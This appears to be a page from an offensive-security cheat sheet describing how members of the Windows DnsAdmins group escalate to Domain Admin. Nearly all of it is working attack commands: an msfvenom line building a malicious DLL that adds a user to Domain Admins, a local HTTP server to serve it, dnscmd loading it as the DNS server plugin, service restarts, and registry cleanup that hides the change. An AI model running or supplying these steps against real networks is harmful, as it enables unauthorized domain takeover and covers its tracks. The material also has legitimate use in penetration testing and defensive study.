DnsAdmins

ABOUT

Members of the DnsAdmins group can access DNS information within the network. The Windows DNS service allows custom plugins, which can execute functions to resolve name queries beyond the locally hosted DNS zones. Since the DNS service operates with NT AUTHORITY\SYSTEM privileges, being part of this group could be exploited to escalate privileges on a Domain Controller or a dedicated DNS server for the domain. The built-in dnscmd utility can be used to define the path of the plugin DLL.

Importing custom plugin

Generating malicious dll

msfvenom -p windows/x64/exec cmd='net group "domain admins" ven17 /add /domain' -f dll -o adduser.dll

Starting local HTTP server

python3 -m http.server 1337

Loading DLL

You should be DnsAdmins group member!

C:\> dnscmd.exe /config /serverlevelplugindll C:\Users\ven17\Desktop\adduser.dll

  • If successful: Registry property serverlevelplugindll successfully reset.

Restart DNS Service

C:\> sc.exe stop dns
C:\> sc.exe start dns

Confirm Admin Privileges

PS C:\> net group "Domain Admins" /dom

Cleanup

Confirming Registry Key Added

C:\> reg query \\13.13.13.13\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

Delete Registry Key

C:\> reg delete \\13.13.13.13\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll

Restart DNS Service

C:\> sc.exe start dns
C:\> sc query dns
PreviousPrint OperatorsNextEvent Log Readers